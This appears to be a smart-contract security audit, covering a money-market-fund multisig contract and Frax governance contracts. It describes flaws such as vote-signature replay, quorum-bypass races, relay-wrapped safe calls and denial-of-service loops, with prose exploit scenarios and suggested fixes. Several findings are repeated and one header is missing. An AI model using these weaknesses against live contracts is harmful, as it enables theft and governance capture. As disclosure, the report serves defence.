This allows the admin to add more than the maximum number of allowed submitters to the MultiSigGenVerifier contract.

Recommendations
Short term, add a check to the addSubmitters function to verify that the resulting length of the submittersSet is less than or equal to the MAX_SUBMITTERS constant. Long term, document the system state machine specification and follow it to ensure proper data validation checks are added in all state-modifying functions. To ensure MAX_SUBMITTERS is never exceeded, add fuzz testing where MAX_SUBMITTERS is the system invariant under test.

+13. Lack of contract existence check on target address

Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-FTMMF-13
Target: FT/infrastructure/multisig/MultiSigGenVerifier.sol

Description
The signedDataExecution function lacks validation to ensure that the target argument is a contract address and not an externally owned account (EOA). The absence of such a check could lead to potential security issues, particularly when executing low-level calls to an address not containing contract code. Low-level calls to an EOA return true for the success variable instead of reverting as they would with a contract address. This unexpected behavior could trigger inadvertent execution of subsequent code relying on the success variable to be accurate, potentially resulting in undesired outcomes. The onlySubmitter modifier limits the potential impact of this vulnerability.

function signedDataExecution(
    address target,
    bytes calldata payload,
    bytes calldata signatures
) external onlySubmitter {
    ...
    // Wallet logic
    if (acquiredThreshold >= _getRequiredThreshold(target)) {
        (bool success, bytes memory result) = target.call{value: 0}(
            payload
        );
        emit TransactionExecuted(target, result);
        if (!success) {
            assembly {
                result := add(result, 0x04)
            }
            revert(abi.decode(result, (string)));
        }
    } else {
        revert("INSUFICIENT_THRESHOLD_ACQUIRED");
    }
}

Figure 13.1: The signedDataExecution function in the MultiSigGenVerifier contract

Exploit Scenario
Alice, an authorized submitter account, calls the signedDataExecution function, passing in an EOA address instead of the expected contract address. The low-level call to the target address returns successfully and does not revert. As a result, Alice thinks she has executed code but in fact has not.

Recommendations
Short term, integrate a contract existence check to ensure that code is present at the address passed in as the target argument, as sketched below. Long term, use the Slither static analyzer to catch issues such as this one. Consider integrating slither-action into the project’s CI pipeline.
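A minimal sketch of such a check, assuming Solidity 0.8.x (where address.code.length is available; earlier compilers would need extcodesize in assembly):

function signedDataExecution(
    address target,
    bytes calldata payload,
    bytes calldata signatures
) external onlySubmitter {
    // Reject externally owned accounts: a low-level call to an EOA
    // succeeds without executing any code.
    require(target.code.length > 0, "TARGET_NOT_A_CONTRACT");
    // ... signature verification and execution follow ...
}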
+14. Pending transactions can trigger a DoS

Severity: Informational Difficulty: Medium Type: Denial of Service Finding ID: TOB-FTMMF-14
Target: FT/infrastructure/modules/TransferAgentModule.sol, FT/MoneyMarketFund.sol

Description
An unbounded number of pending transactions can cause the _processSettlements function to run out of gas while trying to process them. There is no restriction on the number of pending transactions a user might have, and gas-intensive operations are performed in the for loop of the _processSettlements function. If an account has too many pending transactions, operations that call _processSettlements might revert with an out-of-gas error.

function _processSettlements(
    address account,
    uint256 date,
    uint256 price
) internal whenTransactionsExist(account) {
    bytes32[] memory pendingTxs = ITransactionStorage(
        moduleRegistry.getModuleAddress(TRANSACTIONAL_MODULE)
    ).getAccountTransactions(account);
    for (uint256 i = 0; i < pendingTxs.length; ) {
        ...

Figure 14.1: The pendingTxs loop in the _processSettlements function in the MoneyMarketFund contract

The same issue affects the _processSettlements function in the TransferAgentModule contract.

Exploit Scenario
Eve submits multiple transactions to the requestSelfServiceCashPurchase function, each of which creates a pending transaction record in the pendingTransactionsMap for Eve’s account. When settleTransactions is called with an array of accounts that includes Eve, the _processSettlements function tries to process all her pending transactions and runs out of gas in the attempt.

Recommendations
Short term, make the following changes to the transaction settlement flow:
1. Enhance the off-chain component of the system to identify accounts with too many pending transactions and exclude them from calls to _processSettlements flows.
2. Create another transaction settlement function that paginates over the list of pending transactions of a single account.
Long term, implement thorough testing protocols for these loop structures, simulating various scenarios and edge cases that could potentially result in unbounded inputs. Ensure that all loop structures are robustly designed with safeguards in place, such as constraints and checks on input variables.

+15. Dividend distribution has an incorrect rounding direction for negative rates

Severity: Low Difficulty: Medium Type: Data Validation Finding ID: TOB-FTMMF-15
Target: FT/infrastructure/modules/TransferAgentModule.sol, FT/MoneyMarketFund.sol

Description
The rounding direction of the dividend calculation in the _processDividends function benefits the user when the dividend rate is negative, causing the fund to lose value it should retain. The division operation that computes dividend shares rounds down in the _processDividends function of the MoneyMarketFund contract:

function _processDividends(
    address account,
    uint256 date,
    int256 rate,
    uint256 price
) internal whenHasHoldings(account) {
    uint256 dividendAmount = balanceOf(account) * uint256(abs(rate));
    uint256 dividendShares = dividendAmount / price;
    _payDividend(account, rate, dividendShares);
    // handle very unlikely scenario if occurs
    _handleNegativeYield(account, rate, dividendShares);
    _removeEmptyAccountFromHoldingsSet(account);
    emit DividendDistributed(account, date, rate, price, dividendShares);
}

Figure 15.1: The _processDividends function in the MoneyMarketFund contract

As a result, for a negative dividend rate, the rounding benefits the user by subtracting a lower number of shares from the user balance. In particular, if the rate is low and the price is high, the dividend can round down to zero. The same issue affects the _processDividends function in the TransferAgentModule contract.

Exploit Scenario
Eve buys a small number of shares from multiple accounts. The dividend rounds down and is equal to zero. As a result, Eve avoids the losses from the downside movement of the fund while enjoying profits from the upside.

Recommendations
Short term, have the _processDividends function round up the number of dividendShares for negative dividend rates, as sketched below.
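For illustration, a hedged sketch of the rounding change, reusing the names from figure 15.1 and assuming price is nonzero; the ceiling division uses the standard (a + b - 1) / b idiom:

function _processDividends(
    address account,
    uint256 date,
    int256 rate,
    uint256 price
) internal whenHasHoldings(account) {
    uint256 dividendAmount = balanceOf(account) * uint256(abs(rate));
    // Round up for negative rates so small balances cannot escape losses.
    uint256 dividendShares = rate < 0
        ? (dividendAmount + price - 1) / price
        : dividendAmount / price;
    _payDividend(account, rate, dividendShares);
    _handleNegativeYield(account, rate, dividendShares);
    _removeEmptyAccountFromHoldingsSet(account);
    emit DividendDistributed(account, date, rate, price, dividendShares);
}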
Long term, document the expected rounding direction for every arithmetic operation (see appendix G ) and follow it to ensure that rounding is always beneficial to the fund. Use Echidna to find issues arising from the wrong rounding direction. diff --git a/findings_newupdate/tob/2023-05-fraxgov-securityreview.txt b/findings_newupdate/tob/2023-05-fraxgov-securityreview.txt new file mode 100644 index 0000000..b18b367 --- /dev/null +++ b/findings_newupdate/tob/2023-05-fraxgov-securityreview.txt @@ -0,0 +1,15 @@ +1. Race condition in FraxGovernorOmega target validation Severity: High Type: Timing Difficulty: High Finding ID: TOB-FRAXGOV-1 Target: src/FraxGovernorOmega.sol Description The FraxGovernorOmega contract is intended for carrying out day-to-day operations and less sensitive proposals that do not adjust system governance parameters. Proposals directly affecting system governance are managed in the FraxGovernorAlpha contract, which has a much higher quorum requirement (40%, compared with FraxGovernorOmega ’s 4% quorum requirement). When a new proposal is submitted to the FraxGovernorOmega contract through the propose or addTransaction function, the target address of the proposal is checked to prevent proposals from interacting with sensitive functions in allowlisted safes outside of the higher quorum flow (figure 1.1). However, if a proposal to allowlist a new safe is pending in FraxGovernorAlpha , and another proposal that interacts with the pending safe is preemptively submitted through FraxGovernorOmega.propose , the proposal would pass this check, as the new safe would not yet have been added to the allowlist. /// @notice The ```propose``` function is similar to OpenZeppelin's ```propose()``` with minor changes /// @dev Changes include: Forbidding targets that are allowlisted Gnosis Safes /// @return proposalId Proposal ID function propose ( address [] memory targets, uint256 [] memory values, bytes [] memory calldatas, string memory description ) public override returns ( uint256 proposalId ) { _requireSenderAboveProposalThreshold(); for ( uint256 i = 0 ; i < targets.length; ++i) { address target = targets[i]; // Disallow allowlisted safes because Omega would be able to call safe.approveHash() outside of the // addTransaction() / execute() / rejectTransaction() flow if ($safeRequiredSignatures[target] != 0 ) { revert IFraxGovernorOmega.DisallowedTarget(target); } } Figure 1.1: The target validation logic in the FraxGovernorOmega contract’s propose function This issue provides a short window of time in which a proposal to update governance parameters that is submitted through FraxGovernorOmega could pass with the contract’s 4% quorum, rather than needing to go through FraxGovernorAlpha and its 40% quorum, as intended. Such an exploit would also require cooperation from the safe owners to execute the approved transaction. As the vast majority of operations in the FraxGovernorOmega process will be optimistic proposals, the community may not monitor the contract as comprehensively as FraxGovernorAlpha , and a minority group of coordinated veFXS holders could take advantage of this loophole. Exploit Scenario A FraxGovernorAlpha proposal to add a new Gnosis Safe to the allowlist is being voted on. In anticipation of the proposal’s approval, the new safe owner prepares and signs a transaction on this new safe for a contentious or previously vetoed action. Alice, a veFXS holder, uses FraxGovernorOmega.propose to initiate a proposal to approve the hash of this transaction in the new safe. 
Alice coordinates with enough other interested veFXS holders to reach the required quorum on the proposal. The proposal passes, and the new safe owner is able to update governance parameters without the consensus of the community.

Recommendations
Short term, add additional validation to the end of the proposal lifecycle to detect whether the target has become an allowlisted safe. Long term, when designing new functionality, consider how this type of time-of-check to time-of-use mismatch could affect the system.

+2. Vulnerable project dependency

Severity: Undetermined Difficulty: High Type: Patching Finding ID: TOB-FRAXGOV-2
Target: package.json

Description
Although dependency scans did not uncover a direct threat to the project codebase, npm audit identified a dependency with a known vulnerability, the yaml library. Due to the sensitivity of the deployment code and its environment, it is important to ensure that dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the project system as a whole. The output detailing the identified issue is provided below:

yaml (>=2.0.0-5, <2.2.2): CVE-2023-2251, Uncaught exception in GitHub repository eemeli/yaml

Table 2.1: The issue identified by running npm audit

Exploit Scenario
Alice installs the dependencies for the Frax Finance governance protocol, including the vulnerable yaml library, on a clean machine. She subsequently uses the library, which fails to throw an error while formatting a yaml configuration file, impacting important data that the system needs to run as intended.

Recommendations
Short term, ensure that dependencies are up to date. Several node modules have been documented as malicious because they execute malicious code when installing dependencies to projects. Keep modules current and verify their integrity after installation. Long term, consider integrating automated dependency auditing into the development workflow. If dependencies cannot be updated when a vulnerability is disclosed, ensure that the project codebase does not use and is not affected by the vulnerable functionality of the dependency.

+3. Replay protection missing in castVoteWithReasonAndParamsBySig

Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-FRAXGOV-3
Target: Governor.sol

Description
The castVoteWithReasonAndParamsBySig function does not include a voter nonce, so transactions involving the function can be replayed by anyone. Votes can be cast through signatures by encoding the vote counts in the params argument.

function castVoteWithReasonAndParamsBySig(
    uint256 proposalId,
    uint8 support,
    string calldata reason,
    bytes memory params,
    uint8 v,
    bytes32 r,
    bytes32 s
) public virtual override returns (uint256) {
    address voter = ECDSA.recover(
        _hashTypedDataV4(
            keccak256(
                abi.encode(
                    EXTENDED_BALLOT_TYPEHASH,
                    proposalId,
                    support,
                    keccak256(bytes(reason)),
                    keccak256(params)
                )
            )
        ),
        v,
        r,
        s
    );
    return _castVote(proposalId, voter, support, reason, params);
}

Figure 3.1: The castVoteWithReasonAndParamsBySig function does not include a nonce. (Governor.sol#L508-L535)

The castVoteWithReasonAndParamsBySig function calls the _countVoteFractional function in the GovernorCountingFractional contract, which keeps track of partial votes. Unlike _countVoteNominal, _countVoteFractional can be called multiple times, as long as the voter’s total voting weight is not exceeded.

Exploit Scenario
Alice has 100,000 voting power. She signs a message, and a relayer calls castVoteWithReasonAndParamsBySig to vote for one “yes” and one “abstain”. Eve sees this transaction on-chain and replays it for the remainder of Alice’s voting power, casting votes that Alice did not intend to cast.

Recommendations
Short term, either include a voter nonce for replay protection (a sketch follows below) or modify the _countVoteFractional function to require that _proposalVotersWeightCast[proposalId][account] equals 0, which would allow votes to be cast only once. Long term, increase the test coverage to include cases of signature replay.
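A hedged sketch of the nonce-based option, modifying the function from figure 3.1; the added nonce parameter and _voteNonces mapping are illustrative (the EXTENDED_BALLOT_TYPEHASH string would also need to be extended, and the signature no longer matches the OpenZeppelin base function):

// Hypothetical storage for per-voter replay protection.
mapping(address => uint256) private _voteNonces;

function castVoteWithReasonAndParamsBySig(
    uint256 proposalId,
    uint8 support,
    string calldata reason,
    bytes memory params,
    uint256 nonce, // new: bound into the signed digest
    uint8 v,
    bytes32 r,
    bytes32 s
) public virtual returns (uint256) {
    address voter = ECDSA.recover(
        _hashTypedDataV4(
            keccak256(
                abi.encode(
                    EXTENDED_BALLOT_TYPEHASH, // typehash must include the nonce
                    proposalId,
                    support,
                    keccak256(bytes(reason)),
                    keccak256(params),
                    nonce
                )
            )
        ),
        v,
        r,
        s
    );
    // Each signature is valid exactly once per voter.
    require(nonce == _voteNonces[voter]++, "Governor: invalid nonce");
    return _castVote(proposalId, voter, support, reason, params);
}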
+4. Ability to lock any user’s tokens using deposit_for

Severity: Informational Difficulty: Low Type: Data Validation Finding ID: TOB-FRAXGOV-4
Target: veFXS.vy

Description
The deposit_for function can be used to lock anyone’s tokens, given sufficient token approvals and an existing lock.

@external
@nonreentrant('lock')
def deposit_for(_addr: address, _value: uint256):
    """
    @notice Deposit `_value` tokens for `_addr` and add to the lock
    @dev Anyone (even a smart contract) can deposit for someone else, but
         cannot extend their locktime and deposit for a brand new user
    @param _addr User's wallet address
    @param _value Amount to add to user's lock
    """
    _locked: LockedBalance = self.locked[_addr]
    assert _value > 0  # dev: need non-zero value
    assert _locked.amount > 0, "No existing lock found"
    assert _locked.end > block.timestamp, "Cannot add to expired lock. Withdraw"
    self._deposit_for(_addr, _value, 0, self.locked[_addr], DEPOSIT_FOR_TYPE)

Figure 4.1: The deposit_for function can be used to lock anyone’s tokens. (test/veFXS.vy#L458-L474)

The same issue is present in the veCRV contract for the CRV token, so it may be known or intentional.

Exploit Scenario
Alice gives unlimited FXS token approval to the veFXS contract. Alice wants to lock 1 FXS for 4 years. Bob sees that Alice has 100,000 FXS and locks all of the tokens for her. Alice is no longer able to access her 100,000 FXS.

Recommendations
Short term, make users aware of the issue in the existing token contract, and prompt users for exact approval amounts, rather than unlimited approvals, when locking FXS.

+5. The relay function can be used to call critical safe functions

Severity: High Difficulty: Medium Type: Access Controls Finding ID: TOB-FRAXGOV-5
Target: src/Governor.sol

Description
The relay function of the FraxGovernorOmega contract supports arbitrary calls to arbitrary targets and can be leveraged in a proposal to call sensitive functions on the Gnosis Safe.

function relay(
    address target,
    uint256 value,
    bytes calldata data
) external payable virtual onlyGovernance {
    (bool success, bytes memory returndata) = target.call{value: value}(data);
    Address.verifyCallResult(success, returndata, "Governor: relay reverted without message");
}

Figure 5.1: The relay function inherited from Governor.sol

The FraxGovernorOmega contract checks proposed transactions to ensure they do not target critical functions on the Gnosis Safe contract outside of the more restrictive FraxGovernorAlpha flow.
function propose(
    address[] memory targets,
    uint256[] memory values,
    bytes[] memory calldatas,
    string memory description
) public override returns (uint256 proposalId) {
    _requireSenderAboveProposalThreshold();
    for (uint256 i = 0; i < targets.length; ++i) {
        address target = targets[i];
        // Disallow allowlisted safes because Omega would be able to call safe.approveHash() outside of the
        // addTransaction() / execute() / rejectTransaction() flow
        if ($safeRequiredSignatures[target] != 0) {
            revert IFraxGovernorOmega.DisallowedTarget(target);
        }
    }
    proposalId = _propose({
        targets: targets,
        values: values,
        calldatas: calldatas,
        description: description
    });
}

Figure 5.2: The propose function of FraxGovernorOmega.sol

A malicious user can hide a call to the Gnosis Safe by wrapping it in a call to the relay function. There are no further restrictions on the target contract argument, which means the relay function can be called with calldata that targets the Gnosis Safe contract.

Exploit Scenario
Alice, a veFXS holder, submits a transaction to the propose function. The targets array contains the FraxGovernorOmega address, and the corresponding calldatas array contains an encoded call to its relay function. The encoded call to the relay function has a target address of an allowlisted Gnosis Safe and an encoded call to its approveHash function with a payload of a malicious transaction hash. Due to the low quorum threshold on FraxGovernorOmega and the shorter voting period, Alice is able to push her malicious transaction through, and it is approved by the safe even though it should not have been.

Recommendations
Short term, add a check to the relay function that prevents it from targeting addresses of allowlisted safes, as sketched below. Long term, carefully examine all cases of user-provided inputs, especially where arbitrary targets and calldata can be submitted, and expand the unit tests to account for edge cases specific to the wider system.
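A minimal sketch of the short-term recommendation, assuming FraxGovernorOmega overrides the inherited relay function and has access to the $safeRequiredSignatures mapping used in figure 5.2:

function relay(
    address target,
    uint256 value,
    bytes calldata data
) external payable virtual override onlyGovernance {
    // Forbid relay calls whose target is an allowlisted safe, mirroring
    // the check performed in propose().
    if ($safeRequiredSignatures[target] != 0) {
        revert IFraxGovernorOmega.DisallowedTarget(target);
    }
    (bool success, bytes memory returndata) = target.call{value: value}(data);
    Address.verifyCallResult(
        success,
        returndata,
        "Governor: relay reverted without message"
    );
}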
function _delegate ( address delegator , address delegatee ) internal { // Revert if delegating to self with address(0), should be address(delegator) if (delegatee == address ( 0 )) revert IVeFxsVotingDelegation.IncorrectSelfDelegation(); IVeFxsVotingDelegation.Delegation memory previousDelegation = $delegations[delegator]; // This ensures that checkpoints take effect at the next epoch uint256 checkpointTimestamp = (( block.timestamp / 1 days) * 1 days) + 1 days; IVeFxsVotingDelegation.NormalizedVeFxsLockInfo memory normalizedDelegatorVeFxsLockInfo = _getNormalizedVeFxsLockInfo({ delegator: delegator, checkpointTimestamp: checkpointTimestamp }); _moveVotingPowerFromPreviousDelegate({ previousDelegation: previousDelegation, checkpointTimestamp: checkpointTimestamp }); _moveVotingPowerToNewDelegate({ newDelegate: delegatee, delegatorVeFxsLockInfo: normalizedDelegatorVeFxsLockInfo, checkpointTimestamp: checkpointTimestamp }); // ... } Figure 6.2: The _delegate function in VeFxsVotingDelegation.sol Exploit Scenario Eve sets up a contract that accepts delegated votes in exchange for rewards. The contract ends up owning a majority of the FXS voting power. Recommendations Short term, consider whether smart contracts should be allowed to hold voting power. If so, document this fact; if not, add a check to the VeFxsVotingDelegation contract to ensure that addresses receiving delegated voting power are not smart contracts . Long term, when implementing new features, consider the implications of adding them to ensure that they do not lift constraints that were placed beforehand. +7. Lack of public documentation regarding voting power expiry Severity: Informational Difficulty: Low Type: Patching Finding ID: TOB-FRAXGOV-7 Target: VeFxsVotingDelegation.sol Description The user documentation concerning the calculation of voting power is unclear. The Frax-Governance specification sheet provided by the Frax Finance team states, “Voting power goes to 0 at veFXS lock expiration time, this is different from veFXS.getBalance() which will return the locked amount of FXS after the lock has expired.” This statement is in line with the code’s behavior. The _calculateVotingWeight function in the VeFxsVotingDelegation contract does not return the locked veFXS balance once a lock has expired. /// @notice The ```_calculateVotingWeight``` function calculates ```account```'s voting weight. Is 0 if they ever delegated and the delegation is in effect. /// @param voter Address of voter /// @param timestamp A block.timestamp, typically corresponding to a proposal snapshot /// @return votingWeight Voting weight corresponding to ```account```'s veFXS balance function _calculateVotingWeight ( address voter , uint256 timestamp ) internal view returns ( uint256 ) { // If lock is expired they have no voting weight if (VE_FXS.locked(voter).end <= timestamp) return 0 ; uint256 firstDelegationTimestamp = $delegations[voter].firstDelegationTimestamp; // Never delegated OR this timestamp is before the first delegation by account if (firstDelegationTimestamp == 0 || timestamp < firstDelegationTimestamp) { try VE_FXS.balanceOf({ addr: voter, _t: timestamp }) returns ( uint256 _balance ) { return _balance; } catch {} } return 0 ; } Figure 7.2: The function that calculates the voting weight in VeFxsVotingDelegation.sol If a voter’s lock has expired or was never created, the short-circuit condition returns zero voting power. This behavior contrasts with the veFxs.balanceOf function, which would return the user’s last locked FXS balance. 
+1. Race condition in FraxGovernorOmega target validation Severity: High Type: Timing Difficulty: High Finding ID: TOB-FRAXGOV-1 Target: src/FraxGovernorOmega.sol Description The FraxGovernorOmega contract is intended for carrying out day-to-day operations and less sensitive proposals that do not adjust system governance parameters. Proposals directly affecting system governance are managed in the FraxGovernorAlpha contract, which has a much higher quorum requirement (40%, compared with FraxGovernorOmega's 4% quorum requirement). When a new proposal is submitted to the FraxGovernorOmega contract through the propose or addTransaction function, the target address of the proposal is checked to prevent proposals from interacting with sensitive functions in allowlisted safes outside of the higher quorum flow (figure 1.1). However, if a proposal to allowlist a new safe is pending in FraxGovernorAlpha, and another proposal that interacts with the pending safe is preemptively submitted through FraxGovernorOmega.propose, the proposal would pass this check, as the new safe would not yet have been added to the allowlist.
/// @notice The ```propose``` function is similar to OpenZeppelin's ```propose()``` with minor changes
/// @dev Changes include: Forbidding targets that are allowlisted Gnosis Safes
/// @return proposalId Proposal ID
function propose(
    address[] memory targets,
    uint256[] memory values,
    bytes[] memory calldatas,
    string memory description
) public override returns (uint256 proposalId) {
    _requireSenderAboveProposalThreshold();

    for (uint256 i = 0; i < targets.length; ++i) {
        address target = targets[i];

        // Disallow allowlisted safes because Omega would be able to call safe.approveHash() outside of the
        // addTransaction() / execute() / rejectTransaction() flow
        if ($safeRequiredSignatures[target] != 0) {
            revert IFraxGovernorOmega.DisallowedTarget(target);
        }
    }

Figure 1.1: The target validation logic in the FraxGovernorOmega contract's propose function

This issue provides a short window of time in which a proposal to update governance parameters that is submitted through FraxGovernorOmega could pass with the contract's 4% quorum, rather than needing to go through FraxGovernorAlpha and its 40% quorum, as intended. Such an exploit would also require cooperation from the safe owners to execute the approved transaction. As the vast majority of operations in the FraxGovernorOmega process will be optimistic proposals, the community may not monitor the contract as comprehensively as FraxGovernorAlpha, and a minority group of coordinated veFXS holders could take advantage of this loophole. Exploit Scenario A FraxGovernorAlpha proposal to add a new Gnosis Safe to the allowlist is being voted on. In anticipation of the proposal's approval, the new safe owner prepares and signs a transaction on this new safe for a contentious or previously vetoed action. Alice, a veFXS holder, uses FraxGovernorOmega.propose to initiate a proposal to approve the hash of this transaction in the new safe. Alice coordinates with enough other interested veFXS holders to reach the required quorum on the proposal. The proposal passes, and the new safe owner is able to update governance parameters without the consensus of the community. Recommendations Short term, add additional validation to the end of the proposal lifecycle to detect whether the target has become an allowlisted safe. Long term, when designing new functionality, consider how this type of time-of-check to time-of-use mismatch could affect the system.
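One way to implement the short-term recommendation is to re-run the allowlist check at execution time, so that a safe allowlisted after proposal creation can no longer be reached through the Omega flow. The sketch below assumes the OpenZeppelin Governor _execute hook and reuses the $safeRequiredSignatures mapping and DisallowedTarget error from figure 1.1; it is an illustration of the idea, not the team's eventual fix.

function _execute(
    uint256 proposalId,
    address[] memory targets,
    uint256[] memory values,
    bytes[] memory calldatas,
    bytes32 descriptionHash
) internal virtual override {
    for (uint256 i = 0; i < targets.length; ++i) {
        // Re-validate at execution time: a target that joined the allowlist
        // while the proposal was pending must not be callable from Omega
        if ($safeRequiredSignatures[targets[i]] != 0) {
            revert IFraxGovernorOmega.DisallowedTarget(targets[i]);
        }
    }
    super._execute(proposalId, targets, values, calldatas, descriptionHash);
}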
+2. Vulnerable project dependency Severity: Undetermined Difficulty: High Type: Patching Finding ID: TOB-FRAXGOV-2 Target: package.json Description Although dependency scans did not uncover a direct threat to the project codebase, npm audit identified a dependency with a known vulnerability, the yaml library. Due to the sensitivity of the deployment code and its environment, it is important to ensure that dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the project system as a whole. The output detailing the identified issue is provided below:

Dependency: yaml
Version: >=2.0.0-5, <2.2.2
ID: CVE-2023-2251
Description: Uncaught exception in GitHub repository eemeli/yaml

Table 2.1: The issue identified by running npm audit

Exploit Scenario Alice installs the dependencies for the Frax Finance governance protocol, including the vulnerable yaml library, on a clean machine. She subsequently uses the library, which fails to throw an error while formatting a yaml configuration file, impacting important data that the system needs to run as intended. Recommendations Short term, ensure that dependencies are up to date. Several node modules have been documented as malicious because they execute malicious code when installing dependencies to projects. Keep modules current and verify their integrity after installation. Long term, consider integrating automated dependency auditing into the development workflow. If dependencies cannot be updated when a vulnerability is disclosed, ensure that the project codebase does not use and is not affected by the vulnerable functionality of the dependency.

+3. Replay protection missing in castVoteWithReasonAndParamsBySig Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-FRAXGOV-3 Target: Governor.sol Description The castVoteWithReasonAndParamsBySig function does not include a voter nonce, so transactions involving the function can be replayed by anyone. Votes can be cast through signatures by encoding the vote counts in the params argument.

function castVoteWithReasonAndParamsBySig(
    uint256 proposalId,
    uint8 support,
    string calldata reason,
    bytes memory params,
    uint8 v,
    bytes32 r,
    bytes32 s
) public virtual override returns (uint256) {
    address voter = ECDSA.recover(
        _hashTypedDataV4(
            keccak256(
                abi.encode(
                    EXTENDED_BALLOT_TYPEHASH,
                    proposalId,
                    support,
                    keccak256(bytes(reason)),
                    keccak256(params)
                )
            )
        ),
        v,
        r,
        s
    );

    return _castVote(proposalId, voter, support, reason, params);
}

Figure 3.1: The castVoteWithReasonAndParamsBySig function does not include a nonce. (Governor.sol#L508-L535)

The castVoteWithReasonAndParamsBySig function calls the _countVoteFractional function in the GovernorCountingFractional contract, which keeps track of partial votes. Unlike _countVoteNominal, _countVoteFractional can be called multiple times, as long as the voter's total voting weight is not exceeded. Exploit Scenario Alice has 100,000 voting power. She signs a message, and a relayer calls castVoteWithReasonAndParamsBySig to vote for one "yes" and one "abstain". Eve sees this transaction on-chain and replays it for the remainder of Alice's voting power, casting votes that Alice did not intend to. Recommendations Short term, either include a voter nonce for replay protection or modify the _countVoteFractional function to require that _proposalVotersWeightCast[proposalId][account] equals 0, which would allow votes to be cast only once. Long term, increase the test coverage to include cases of signature replay.
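A minimal sketch of the nonce-based option, modeled on figure 3.1. The explicit voter argument, the nonces mapping, and the extended typehash are illustrative assumptions rather than the audited code; consuming the nonce inside the signed digest means a relayed signature can be used at most once.

bytes32 public constant EXTENDED_BALLOT_WITH_NONCE_TYPEHASH =
    keccak256("ExtendedBallotWithNonce(uint256 proposalId,uint8 support,string reason,bytes params,uint256 nonce)");

mapping(address => uint256) public nonces;

function castVoteWithReasonAndParamsBySig(
    uint256 proposalId,
    uint8 support,
    address voter,
    string calldata reason,
    bytes memory params,
    uint8 v,
    bytes32 r,
    bytes32 s
) public virtual returns (uint256) {
    address recovered = ECDSA.recover(
        _hashTypedDataV4(
            keccak256(
                abi.encode(
                    EXTENDED_BALLOT_WITH_NONCE_TYPEHASH,
                    proposalId,
                    support,
                    keccak256(bytes(reason)),
                    keccak256(params),
                    nonces[voter]++ // consume the nonce so the signature cannot be replayed
                )
            )
        ),
        v,
        r,
        s
    );
    require(recovered == voter, "Governor: invalid signature");

    return _castVote(proposalId, voter, support, reason, params);
}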
+4. Ability to lock any user's tokens using deposit_for Severity: Informational Difficulty: Low Type: Data Validation Finding ID: TOB-FRAXGOV-4 Target: veFXS.vy Description The deposit_for function can be used to lock anyone's tokens given sufficient token approvals and an existing lock.

@external
@nonreentrant('lock')
def deposit_for(_addr: address, _value: uint256):
    """
    @notice Deposit `_value` tokens for `_addr` and add to the lock
    @dev Anyone (even a smart contract) can deposit for someone else, but
         cannot extend their locktime and deposit for a brand new user
    @param _addr User's wallet address
    @param _value Amount to add to user's lock
    """
    _locked: LockedBalance = self.locked[_addr]

    assert _value > 0  # dev: need non-zero value
    assert _locked.amount > 0, "No existing lock found"
    assert _locked.end > block.timestamp, "Cannot add to expired lock. Withdraw"

    self._deposit_for(_addr, _value, 0, self.locked[_addr], DEPOSIT_FOR_TYPE)

Figure 4.1: The deposit_for function can be used to lock anyone's tokens. (test/veFXS.vy#L458-L474)

The same issue is present in the veCRV contract for the CRV token, so it may be known or intentional. Exploit Scenario Alice gives unlimited FXS token approval to the veFXS contract. Alice wants to lock 1 FXS for 4 years. Bob sees that Alice has 100,000 FXS and locks all of the tokens for her. Alice is no longer able to access her 100,000 FXS. Recommendations Short term, make users aware of the issue in the existing token contract. Only present the user with exact approval limits when locking FXS.

+5. The relay function can be used to call critical safe functions Severity: High Difficulty: Medium Type: Access Controls Finding ID: TOB-FRAXGOV-5 Target: src/Governor.sol Description The relay function of the FraxGovernorOmega contract supports arbitrary calls to arbitrary targets and can be leveraged in a proposal to call sensitive functions on the Gnosis Safe.

function relay(
    address target,
    uint256 value,
    bytes calldata data
) external payable virtual onlyGovernance {
    (bool success, bytes memory returndata) = target.call{value: value}(data);
    Address.verifyCallResult(success, returndata, "Governor: relay reverted without message");
}

Figure 5.1: The relay function inherited from Governor.sol

The FraxGovernorOmega contract checks proposed transactions to ensure they do not target critical functions on the Gnosis Safe contract outside of the more restrictive FraxGovernorAlpha flow.

function propose(
    address[] memory targets,
    uint256[] memory values,
    bytes[] memory calldatas,
    string memory description
) public override returns (uint256 proposalId) {
    _requireSenderAboveProposalThreshold();

    for (uint256 i = 0; i < targets.length; ++i) {
        address target = targets[i];

        // Disallow allowlisted safes because Omega would be able to call safe.approveHash() outside of the
        // addTransaction() / execute() / rejectTransaction() flow
        if ($safeRequiredSignatures[target] != 0) {
            revert IFraxGovernorOmega.DisallowedTarget(target);
        }
    }

    proposalId = _propose({ targets: targets, values: values, calldatas: calldatas, description: description });
}

Figure 5.2: The propose function of FraxGovernorOmega.sol

A malicious user can hide a call to the Gnosis Safe by wrapping it in a call to the relay function. There are no further restrictions on the target contract argument, which means the relay function can be called with calldata that targets the Gnosis Safe contract. Exploit Scenario Alice, a veFXS holder, submits a transaction to the propose function. The targets array contains the FraxGovernorOmega address, and the corresponding calldatas array contains an encoded call to its relay function. The encoded call to the relay function has a target address of an allowlisted Gnosis Safe and an encoded call to its approveHash function with a payload of a malicious transaction hash. Due to the low quorum threshold on FraxGovernorOmega and the shorter voting period, Alice is able to push her malicious transaction through, and it is approved by the safe even though it should not have been. Recommendations Short term, add a check to the relay function that prevents it from targeting addresses of allowlisted safes. Long term, carefully examine all cases of user-provided inputs, especially where arbitrary targets and calldata can be submitted, and expand the unit tests to account for edge cases specific to the wider system.
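A sketch of the short-term recommendation, assuming relay is overridden in FraxGovernorOmega, where the $safeRequiredSignatures mapping from figure 5.2 is in scope; the body otherwise mirrors figure 5.1.

function relay(
    address target,
    uint256 value,
    bytes calldata data
) external payable virtual override onlyGovernance {
    // Apply the same allowlisted-safe restriction that propose() enforces,
    // closing the wrapped-call loophole described above
    if ($safeRequiredSignatures[target] != 0) {
        revert IFraxGovernorOmega.DisallowedTarget(target);
    }

    (bool success, bytes memory returndata) = target.call{value: value}(data);
    Address.verifyCallResult(success, returndata, "Governor: relay reverted without message");
}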
